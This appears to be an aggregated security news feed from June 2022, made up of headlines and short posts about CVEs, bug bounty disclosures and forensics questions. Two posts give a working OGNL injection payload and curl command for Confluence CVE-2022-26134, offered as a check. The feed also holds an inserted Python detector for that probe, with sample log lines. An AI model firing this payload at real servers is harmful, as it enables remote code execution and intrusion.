    Article URL: https://www.phoronix.com/scan.php?page=news_item&px=Apple-M1-PACMAN Comments URL: https://news.ycombinator.com/item?id=31692824 Points: 7 # Comments: 2
    Security Vulnerability in Gitlab: Sending Requests Through Jupyter Notebooks
    Article URL: https://liman.io/blog/gitlab-security-vulnerability-jupyter-notebooks Comments URL: https://news.ycombinator.com/item?id=31691130 Points: 1 # Comments: 0
  • Open

    password manager for IT department
    What is everyone using in their IT department to share passwords? Looking for something with MFA/YubiKey. Reading about Dashlane and 1Password, and it seems like in the past year I read that both are not what they used to be. Bitwarden, some say it's clunky, but it seems well liked. Really looking for something that syncs to the cloud, so we have offline access. submitted by /u/clarksavagejunior [link] [comments]
    Does Windows Defender detect Follina?
    If it does, what does it call it? Does MS have a different name for this attack, or does it only detect the payload it tries to inject? submitted by /u/ThePorko [link] [comments]
    Broad subject, overwhelmed by choice of programming languages to focus on.
    Hi, I'm a 2nd-year cybersecurity student and I am shooting for a career along the lines of pentesting, cybersec researcher, network engineer. I studied Python but, frankly, I sucked and I needed much more practice. At the same time I have a 3-month break with no studies, and I want to use this time to choose a language to learn. Cybersecurity is such a broad subject. Sometimes I can't see the forest for the trees. I need help on choosing where to focus my efforts. These are my choices: learn C; learn (more) Bash; learn (more) Python. As far as resources, I have: Devices: a smartphone, a busted laptop failing to run Kali Linux and waiting for a fresh install, and an Ubuntu desktop. Books: The Rootkit Arsenal by Bill Blunden; Applied Cryptography: Protocols, Algorithms and Source Code in C by Bruce Schneier; Black Hat Python by Justin Seitz. Online: Cisco Networking Academy courses (networking essentials, cloud computing), first-year study materials for subjects on Python coding, Linux shell, operating systems, hardware and OS architecture, and a subscription to TryHackMe (offensive security path). I'd really appreciate your thoughts because I feel like I've got all this gear and all this motivation but... where to start, and which info will still be useful in 20 years? 50 years? submitted by /u/hobnobmatrixx [link] [comments]
  • Open

    bd-j exploit chain
    PlayStation disclosed a bug submitted by theflow0: https://hackerone.com/reports/1379975 - Bounty: $20000
    RXSS on
    U.S. Dept Of Defense disclosed a bug submitted by tmz900: https://hackerone.com/reports/1555582
  • Open

    SecWiki News 2022-06-10 Review
    Research on supply-chain attacks against package managers of interpreted languages by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Brainpan 1 WriteUp Tryhackme
    No content preview
  • Open

    HP Server Raid
    I have two HP servers (a Z820 workstation and a ProLiant DLP360P Gen 8); both have 4 x 10 TB disks inside. I cannot turn these on due to various reasons. I have used X-Ways to try and rebuild the RAID using Level 5 Backward Delayed (HP); it showed there is an LVM2 container. I found a video online that shows you need to scan for the lost partitions, which I did, but it did not bring back any results. I have also tried using RAID Reconstructor, but it is unable to tell me anything about the RAID settings, which makes me believe it is a proprietary HP RAID. Any suggestions on getting these RAIDs rebuilt would be appreciated. submitted by /u/ambitiousdonut94 [link] [comments]
  • Open

    CVE-2022-0540: Atlassian JIRA authentication bypass vulnerability with a wide range of affected versions
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/3EWju-IdsTfK7COKOK-c-w Vulnerability information: JIRA has an authentication bypass vulnerability in the Seraph component, with a wide impact. According to the official description, a large number of default and third-party plugins are affected. About the Seraph Filter: for an authentication bypass, the problem presumably lies in the Filter handling; JIRA internally wraps a fairly large list of Filters...
    CVE-2022-1388: F5 BIG-IP iControl REST request-handling analysis and authentication bypass vulnerability reproduction
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/DR0RGE0lhBjBIF3TbDLhMw Vulnerability information: F5 BIG-IP is an application delivery platform from the US company F5 that integrates network traffic management, application security management, load balancing and other functions. On 4 May 2022, F5 published a security advisory fixing an authentication bypass vulnerability in BIG-IP iControl REST. Vulnerability ID: CVE-2022-13...

  • Open

    Launching the PortSwigginar
    Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: a recap on "what's new" within the tool for those who have
  • Open

    Cyber Security Mind Map: Any ideas here useful?
    Does anyone think any of these ideas in green are worthwhile? Cyber Security Mind Map I'm looking for honest feedback. I just used the SCAMPER technique, along with this mind map to think of these ideas. For example, focusing on Anti-Malware with SCAMPER... I just went through some of the questions in the video for Substitute, Combine, Adapt, Modify, Purpose, and Rearrange to generate new ideas relating to Anti-Malware and other topics. My question is would any of the ideas described in the mind map be useful in preventing or detecting attacks? I haven't been able to get any feedback so far. :( submitted by /u/greyyit [link] [comments]
  • Open

    Magnet business strategy and pricing (Cyber?)
    What do you think about Magnet not including the Email Explorer feature in the non-Cyber version of AXIOM? https://www.magnetforensics.com/blog/reviewing-email-evidence-with-email-explorer-in-magnet-axiom-cyber/ It seems that they are starting to carve out features to force customers into AXIOM Cyber. AXIOM Cyber is 12K USD, I think. As a reminder, this is what we used to pay when they released AXIOM 4 years ago: IEF: $3,625; AXIOM Computer: $3,800; AXIOM (Computer & Mobile): $5,600. Their spiel is that Cyber will be corporate-oriented and standard AXIOM LEO-oriented, but I am not buying that. Love the software, but they always played with features being extra and then just charging more... This was the IEF comment I got at the AXIOM release time: email quote: "We rolled all the artifacts up into new IEF licenses so customers wouldn't have to come back to us to buy any modules they may have forgot to include." More like we were forgetting to go deeper into the wallet, so we made it mandatory... submitted by /u/Erminger [link] [comments]
    moto stylus
    Has anyone been able to get an image of this phone, the Moto Stylus? I just need the call list, if there is some way to obtain it. Thanks submitted by /u/JW4704 [link] [comments]
    Mount Navigation Device as Mass Storage instead of MTP
    Is there a way to sort of force-mount a navigation device (Garmin) as Mass Storage so I can pull a physical image? submitted by /u/visorov [link] [comments]
    Filesystem Imaging iOS
    Hello community... I'm trying to create a dd image of the filesystem for iOS 9.3.5 and 12. After SSHing into the device, when trying to create the dd image it displays "resource is busy"; the umount command also shows the partition is busy. How may I proceed to create the dd image or create a tarball? Any suggestions would be helpful. submitted by /u/Aromatic_Ideal_2933 [link] [comments]
  • Open

    SecWiki News 2022-06-09 Review
    Microsoft's data security protection: Know Your Data by ourren; Some thoughts on data security by ourren; Security operations as I understand it by adrain; Cybersecurity technology innovation trends as seen from the RSAC 2022 Innovation Sandbox by ourren. For more of the latest articles, visit SecWiki.
  • Open

    WMI Providers for Script Kiddies
    Introduction So, this WMI stuff seems legit. Admins get a powerful tool which Script Kiddies can also use for profit. But there’s gotta be more, right? What if I want to take my WMI-fu to the next level? In the previous blog post, “WMI for Script Kiddies,” we described Windows Management Instrumentation (WMI). We detailed... The post WMI Providers for Script Kiddies appeared first on TrustedSec.
  • Open

    LockBit 2.0: How This RaaS Operates and How to Protect Against It
    LockBit 2.0 has so far been this year's most active ransomware gang on double-extortion leak sites. Learn about their tactics. The post LockBit 2.0: How This RaaS Operates and How to Protect Against It appeared first on Unit 42.
  • Open

    Moderator can enable cam/mic remotely if cam/mic-permission was disabled while user has activated cam/mic
    Nextcloud disclosed a bug submitted by michag86: https://hackerone.com/reports/1520685 - Bounty: $100
    Integer overflows in unescape_word()
    curl disclosed a bug submitted by ddme: https://hackerone.com/reports/1564922
    match
    curl disclosed a bug submitted by maslahhunter: https://hackerone.com/reports/1555440
  • Open

    Tesla NFC Key Card Security Vulnerability Demonstration
    Article URL: https://old.reddit.com/r/teslamotors/comments/v86pc1/tesla_nfc_key_card_security_vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31680342 Points: 2 # Comments: 0
    Zero-Day Vulnerability in Atlassian Confluence
    On 2022-06-03, a new zero-day vulnerability occurred. CVE-2022-26134 is a command injection vulnerability. According to the report, a zero-day attack began during the Memorial Day holiday in the United States, and an attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see the full report on this blog: https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with curl or a Python script to determine whether your Confluence server is vulnerable. Even if you are not an information security officer, there is a way to check the vulnerability of your company's Confluence. Try the following method and immediately request patches from your security department: https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#result))}/ If you change the address part to your Confluence address, you can check it with curl as follows. If the uid, gid and groups of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have the CVE-2022-26134 vulnerability. curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response Comments URL: https://news.ycombinator.com/item?id=31677086 Points: 17 # Comments: 6
  • Open

    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 3)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA Continued from: Part 1, sample analysis: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 1); Part 2, vulnerability reproduction: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 2). This third part of the series mainly covers the root cause and principle of the vulnerability...
    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 2)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw Continued from: Part 1, sample analysis: CVE-2021-40444 Microsoft MSHTML remote command execution vulnerability analysis (Part 1). After analysing the sample circulating online, I set out to reproduce the vulnerability by replacing the file inside the cab file. Installed Office version: Microsoft Word 2016 (16....
    CVE-2021-40444: Microsoft MSHTML remote command execution vulnerability analysis (Part 1)
    Author: 且听安全 Original link: https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg Vulnerability overview: On 8 September 2021, Microsoft published a security advisory disclosing a Microsoft MSHTML remote code execution vulnerability. An attacker can craft a malicious ActiveX control for use by a Microsoft Office document that hosts the browser rendering engine; after successfully luring a user into opening the malicious document, the attacker can execute code on the target system with that user's privileges...
  • Open

    Analysis report of Zero-day Vulnerability in Atlassian Confluence.
    On 2022-06-03, a new zero-day vulnerability occurred. CVE-2022-26134 is a command injection vulnerability. According to the report, a zero-day attack began during the Memorial Day holiday in the United States, and an attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see the full report on this blog: https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with curl or a Python script to determine whether your Confluence server is vulnerable. Even if you are not an information security officer, there is a way to check the vulnerability of your company's Confluence. Try the following method and immediately request patches from your security department: https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#result))}/ If you change the address part to your Confluence address, you can check it with curl as follows. If the uid, gid and groups of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have the CVE-2022-26134 vulnerability. curl -v -k --head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response submitted by /u/Late_Ice_9288 [link] [comments]
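    The two Confluence items above (the Hacker News post and this Reddit post) give the same URL-encoded OGNL probe. As an added example that is neither from those posts nor from Atlassian, the following Python flags requests carrying that kind of OGNL expression in the request URI when run over web access logs, percent-decoding up to twice because probes are sometimes double-encoded. The combined-log layout, the marker strings and the three sample lines are constructed assumptions, not captured traffic.

```python
"""Flag CVE-2022-26134 (Confluence OGNL injection) attempts in web access logs.

Added example, not part of the original posts. The sample lines below are
constructed to mimic the Apache/NGINX combined log format.
"""
import re
import urllib.parse
from typing import Dict, List, Optional

# Combined log format: host ident user [time] "METHOD path PROTO" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# OGNL / WebWork markers that appear in the public probe for this CVE.
OGNL_MARKERS = (
    "@java.lang.Runtime@",
    "@org.apache.commons.io.IOUtils@",
    "ServletActionContext",
)


def decode_path(path: str, rounds: int = 2) -> str:
    """Percent-decode up to `rounds` times, stopping early once decoding is a no-op."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote(path)
        if decoded == path:
            break
        path = decoded
    return path


def is_ognl_probe(path: str) -> bool:
    """True if the decoded request path looks like an OGNL expression in the URI.

    A URI whose first path segment begins with `${` is a strong signal on its own
    (legitimate Confluence URLs never do that); any of the markers makes it near-certain.
    """
    decoded = decode_path(path)
    if "${" not in decoded:
        return False
    return decoded.startswith("/${") or any(m in decoded for m in OGNL_MARKERS)


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line into named fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_attempts(lines: List[str]) -> List[Dict[str, str]]:
    """Return the parsed records of every line whose path looks like an OGNL probe."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and is_ognl_probe(rec["path"]):
            rec["decoded_path"] = decode_path(rec["path"])
            hits.append(rec)
    return hits


# Constructed sample: a benign request, the public probe (URL-encoded once),
# and a double-encoded variant of a minimal expression.
SAMPLE_LOG = [
    '198.51.100.7 - - [05/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [05/Jun/2022:10:01:05 +0000] "GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1" 302 0 "-" "curl/7.81.0"',
    '203.0.113.9 - - [05/Jun/2022:10:01:09 +0000] "GET /%2524%257B%2523a%253D1%257D/ HTTP/1.1" 302 0 "-" "curl/7.81.0"',
]

if __name__ == "__main__":
    for hit in find_attempts(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["decoded_path"][:60])
```

    Matching on the decoded path rather than on the raw string is the point: a detection keyed on the literal `%24%7B` misses the double-encoded form, and one keyed only on the marker strings misses shorter expressions.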

  • Open

    Active directory scripts for setting a lab?
    Are there any good resources or scripts etc... to build your own AD server to do some labs on? submitted by /u/networkalchemy [link] [comments]
    IAST that works with AWS Fargate and Lambda
    Hey everyone, does anyone have any recommendations for an IAST tool that may work with Fargate and Lambda? I've run a few DAST trials and none of them seems to work well with React.js SPAs (Tenable, Probely, Detectify, etc.). We have EKS (Fargate) for the customer-facing app and many smaller Lambda services with API Gateway. submitted by /u/greyeye77 [link] [comments]
  • Open

    Mostly newer US & UK movies & TV; some classics & grindhouse sprinkled in
    http://vod.simpletv.eu/media/storage/ submitted by /u/acidwashvideo [link] [comments]
  • Open

    Exploiting Amazon active vulnerability
    How to exploit an Amazon active vulnerability and get access to Prime (& all its benefits, including all Prime Video Channels) for FREE!... Continue reading on Medium »
    Setting Up Burp Suite
    Day 0: Recon Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
    What Is Bug Bounty — How To Make Money As A Hacker — NM Tech blog — Sharing Tech Knowledge
    1) What is Bug Bounty Continue reading on Medium »
    Don’t get caught in the viewer list of any user story of Instagram
    Hi Continue reading on Medium »
    Announcing Qilin V2 Mainnet Bug Bounty Program on Immunefi
    Following our V2 mainnet launch on April 21st, Qilin will initiate a new round of its long-term Bug Bounty Program with a total reward of… Continue reading on Medium »
  • Open

    what is your preferred tool to capture websites?
    Seeking info regarding what tools you have used to capture website pages for investigation purposes. submitted by /u/ATXChimera [link] [comments]
    EnCase 20.2 not detecting local storage or removable media on Add Evidence menu
    OK, n00b question here, having an issue with EnCase 20.2. I just tried reinstalling for the 3rd time now, and I cannot for the life of me figure out why it won't detect my local storage HDD or a USB stick. I can see both in FastBloc SE, but when I attempt to locate/add either as evidence, nothing happens, even after unchecking or leaving the default options to add a local device. Not sure what's going on. submitted by /u/Termin4lyIns4neLabs [link] [comments]
    Should I be able to create an AXIOM portable case that allows the user to view the file system?
    Just noticed that the file system view is grayed out in the portable case I made, not sure if I missed an option or if it's an inherent limitation with a portable case. submitted by /u/Expensive_Ad6442 [link] [comments]
  • Open

    Several Subdomains Takeover
    Reddit disclosed a bug submitted by 3amii: https://hackerone.com/reports/1591085
    XSS by clicking Jira's link
    GitLab disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1194254 - Bounty: $1130
    Gitlab Pages token theft using service workers
    GitLab disclosed a bug submitted by ehhthing: https://hackerone.com/reports/1439552 - Bounty: $1680
    "External status checks" can be accepted by users below developer access if the user is either author or assignee of the target merge request
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1375393 - Bounty: $610
    Stored XSS on issue comments and other pages which contain notes
    GitLab disclosed a bug submitted by jarij: https://hackerone.com/reports/1398305 - Bounty: $3000
    Reflected XSS on https://www.glassdoor.com/parts/header.htm
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1073712 - Bounty: $600
    Reflected XSS on https://help.glassdoor.com/gd_requestsubmitpage
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1094224 - Bounty: $500
    Open redirect on https://www.glassdoor.com/profile/siwa.htm via state parameter
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1097208 - Bounty: $100
  • Open

    New Technique: Extracting Clear-Text Credentials Directly From Chromium’s Memory
    submitted by /u/jat0369 [link] [comments]
    Using Windows Event Log IDs for Threat Hunting
    submitted by /u/sciencestudent99 [link] [comments]
    People’s Republic of China State-Sponsored Actors Exploit Network Providers and Devices
    submitted by /u/ksr_malware [link] [comments]
    CVE-2022-30287 - Remote Code Execution via Email in Horde Webmail
    submitted by /u/monoimpact [link] [comments]
    Confluence Webshells being dropped into the honeypot
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    [Security Advisory] 泛微 (Weaver) E-Office file inclusion vulnerability (CNVD-2022-43247...
    Recently, CNVD officially published a file inclusion vulnerability in 泛微 (Weaver) E-Office. Weaver has released a patch; all users are advised to download and update promptly...
    [Security Advisory] 泛微 (Weaver) E-Office SQL injection vulnerability (CNVD-2022-43246...
    Recently, CNVD officially published an SQL injection vulnerability in 泛微 (Weaver) E-Office. Weaver has released a patch; all users are advised to download and update promptly....
  • Open

    Vulnerability Management in 4 Stages
    Article URL: https://ross-sec-audio.github.io//posts/Vulnerability-Management-in-4-Stages/ Comments URL: https://news.ycombinator.com/item?id=31671924 Points: 1 # Comments: 1
    Risk, Threat, or Vulnerability? What's the Difference
    Article URL: https://www.kennasecurity.com/blog/risk-vs-threat-vs-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31667578 Points: 1 # Comments: 0
    Updates for GKE Authorized Networks After Vulnerability Rewards Program Report
    Article URL: https://cloud.google.com/blog/products/identity-security/updates-coming-for-authorized-networks-and-cloud-runfunctions-on-gke Comments URL: https://news.ycombinator.com/item?id=31662195 Points: 1 # Comments: 0
  • Open

    My #Rightscon2022 keynote address at the Human Rights Journalists Network panel session on Media…
    Whether in Nigeria or somewhere in USA, citizens, and journalists are investigating and documenting human rights abuses. Darnella Fraizer… Continue reading on Medium »
    War in Ukraine / June 7
    The difficult process of postwar reconstruction Continue reading on Medium »
    Image Analysis -Osint Tools
    What is Image Analysis??? Continue reading on Medium »
    Gathering JUICY info from Instagram
    Hey hi everyone, I’m back with another interesting blog. In this blog I will show you how you can get private information of any Instagram… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-08 Review
    A brief discussion of device fingerprinting technology and its applications by ourren; Traceback and counterattack case sharing (Part 2) by ourren; Automated SQL script review tool (MySQL) by ourren; 2022 Cloud-Native Security Technology Summit talk slides by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    To resist cyber risk, enterprises should focus on security platforms | Live from RSAC 2022
    As organisations go ever deeper into highly interconnected digital ecosystems, how to cope with cyber attacks coming from every direction is a problem every CISO has to face.
    FreeBuf | EU to require Apple and other devices to use the USB Type-C connector; CAICT publishes the "Software Bill of Materials Practice Guide"
    The European Parliament has reached agreement on proposed legislation that will require all future smartphones, including Apple's iPhone, to use a common USB-C port for charging.
    Cyber Asset Attack Surface Management (CAASM) becomes a new security approach | Live from RSAC 2022
    How CAASM helps enterprises take a full inventory of cyber assets, continuously improve asset visibility and cloud configuration, and reduce the risk of security vulnerabilities became one of the focal points of RSAC 2022.
    Hacker gangs gain "another member": AI hackers may soon take the stage | Live from RSAC 2022
    RSAC 2022, known as the "Oscars" of the cyber world, was delayed until June. What new views does Schneier have on AI hacking this year?
    With malware and supply-chain attacks on the rise, enterprises need to rethink their security strategy | Live from RSAC 2022
    As the annual feast of the global cybersecurity industry, RSA Conference 2022 is being held in San Francisco, USA, from 6 to 9 June.
    Google pays residents 100 million US dollars for privacy violations
    Google Photos grouped similar faces appearing in photos without adequate prior notice and consent.
  • Open

    Hiding Your Covenant Grunts
    submitted by /u/Diesl [link] [comments]

  • Open

    Ebooks covering chemistry, military, logistics etc
    https://ftp.idu.ac.id/wp-content/uploads/ebook/ submitted by /u/c-rn [link] [comments]
  • Open

    [Windows] Hidden Bind Shell
    Hello! Today I will present you a very interesting bind shell technique; we will hide from other hosts... Continue reading on Medium »
    HackTheBox — Paper [Write-up]
    Today I would like to change the pace and try some Easy challenges from HackTheBox. I picked Paper which is a The Office-themed machine… Continue reading on Medium »
    The Prince0f4llSaiyanz
    Hello and thanks to everyone who took the time to click here and read. My name is Xavier, known a few places as TheMadHatter or… Continue reading on Medium »
  • Open

    Question about hands on practice
    I'm gonna apologize in advance for my noobish question, but could you theoretically build an insecure piece of software or application (telegram like messenger for example) and practice exploitation locally (RCE potentially?) or is there more to it such as os level defense mechanisms that would prevent that? submitted by /u/WarmToiletSeat0 [link] [comments]
  • Open

    DogWalk 0-day vulnerability in Microsoft's Diagnostic Tool
    submitted by /u/CyberMasterV [link] [comments]
    AWS S3 Scanner: Online tool for finding misconfigurations
    submitted by /u/virtue-elliott [link] [comments]
    Network analysis of a targeted phish that got past Defender
    submitted by /u/tmpXXXXXX [link] [comments]
    Open source automated NIST SP 800-53 r5 benchmark for AWS (120+ controls!)
    submitted by /u/bobtbot [link] [comments]
    CVE-2022-29622: (In)vulnerability Analysis
    submitted by /u/JohnKeymanUK [link] [comments]
    Multiple vulnerabilities in Zyxel zysh
    submitted by /u/0xdea [link] [comments]
    Scanning statistics of vulnerable Atlassian Confluence Server(CVE-2022-26134) : Still lots of servers are exposed to the internet.
    submitted by /u/Late_Ice_9288 [link] [comments]
    Building Safe End-to-End Encrypted Services for Business - a Google Workspace perspective
    submitted by /u/ebursztein [link] [comments]
    Observed In The Wild: Atlassian Confluence Server CVE-2022-26134
    submitted by /u/netsecfriends [link] [comments]
  • Open

    How to get into Cyber Security in 2022
    Hello there! I hope you all are well and doing great in your life. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Found 3 bugs in Similarweb.com which didn't pay
    Hi folks, I have found 3 bugs in Similarweb which didn't pay and didn't thank; check it out. Continue reading on Medium »
    How Smartlook took a bug and didn't pay as they said they would, & also has a bug bounty programme!
    Stored XSS admin takeover from a low-privileged user on app.smartlook.com Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Aurora Inflation Spend Bugfix Review: $6m Payout
    Summary Continue reading on Immunefi »
    I have a nickname you won't like.
    Hello my friends, how are you? I hope you are well. Continue reading on Medium »
    An unusual way to find XSS injection in one minute
    Hi there! I think that many developers have heard that you can’t trust any user input, and indeed it is. However, there are some places… Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    Disclosing an unfixed Google Cloud Platform vulnerability post 90-day deadline
    Article URL: https://twitter.com/itspeterc/status/1534205155914264576 Comments URL: https://news.ycombinator.com/item?id=31659573 Points: 2 # Comments: 0
    Microsoft won't say if it will patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31658744 Points: 1 # Comments: 0
    Microsoft won’t say if it'll patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31652144 Points: 2 # Comments: 1
  • Open

    War in Ukraine / June 6
    Ukraine does not expect an attack from Belarus Continue reading on Medium »
    Top OSINT tools: find sensitive public information before hackers
    Top OSINT tools: find sensitive public information before hackers Continue reading on Medium »
  • Open

    SecWiki News 2022-06-07 Review
    A survey of industrial control system security by ourren; C-V2X security research by ourren; SecWiki Weekly (Issue 431) by ourren; Exploring a way forward for IoT security in OT environments by h4ck01; Abusing hidden properties to attack the Node.js ecosystem by ourren; Using LATCH to block install-time attacks in the npm ecosystem by ourren; The rise and fall of typical cloud cryptomining gangs by Avenger; Military applications of Starlink by ourren. For more of the latest articles, visit SecWiki.
  • Open

    Tip on working with E01 images of a Linux system -> accessing an LVM partition (Tsurugi Linux as a forensic workstation)
    submitted by /u/DFIRScience [link] [comments]
    Memory forensics analysis with Volatility | HackTheBox Export | Intro to Blue Team.
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Path traversal, to RCE
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/733072 - Bounty: $12000
    Steal private objects of other projects via project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/743953 - Bounty: $20000
    Private objects exposed through project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/767770 - Bounty: $20000
    Path traversal in Nuget Package Registry
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/822262 - Bounty: $12000
    Store Admin Page Accessible Without Authentication at http://www.grouplogic.com/ADMIN/store/index.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164854 - Bounty: $250
    Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164853
  • Open

    Atlassian Confluence Server CVE-2022-26134 being actively exploited in the wild
    Article URL: https://www.greynoise.io/blog/observed-in-the-wild-atlassian-confluence-server-cve-2022-26134 Comments URL: https://news.ycombinator.com/item?id=31652889 Points: 14 # Comments: 6
  • Open

    FreeBuf Morning Report | Italian city of Palermo goes offline after cyber attack; Facebook appoints its first CISO
    Affected by a cyber attack, the city of Palermo, with a population of 1.3 million, was forced to shut down all its systems, with a huge impact on a wide range of operational services that residents and tourists depend on.
    Years of endpoint security experience: the full-chain security protection built at Alipay | Public lecture on 24 June at 19:00
    24 June (Friday) at 19:00. See you there.
    Keyword "transformation": Talon wins the Innovation Sandbox contest | Live from RSAC 2022
    Startup Talon Cyber Security beat the field to win the Innovation Sandbox contest, becoming the "rising star" in the eyes of the cybersecurity industry.
    Cloud attack surface management has become the trend | Live from RSAC 2022
    Cloud attack surface management has long been an indispensable part of overall enterprise security.
    An Italian city plans to shut down its systems to resist a cyber attack
    The city of Palermo in southern Italy suffered a cyber attack, which had a huge impact on the city's operations, residents and tourists.
    A record of exploiting a horizontal authorization bypass vulnerability
    Records the whole process of a horizontal authorization bypass.
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    Analysis of the CVE-2022-30190 MSDT Code Injection Vulnerability
    Author: HuanGMz@Knownsec 404 Team Date: June 7, 2022 English version: https://paper.seebug.org/1914/ An analysis of the recent MSDT vulnerability related to Microsoft Office. 1. WTP framework Documentation: https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Best tool to clone NFC tags from a distance?
    I currently have the ProxMark3 but I need to get the NFC tag really close. Is there any modifications I can do? If not, what product would you recommend? submitted by /u/ErikDz11 [link] [comments]

  • Open

    Misconfigured login page able to lock login action for any account without user interaction
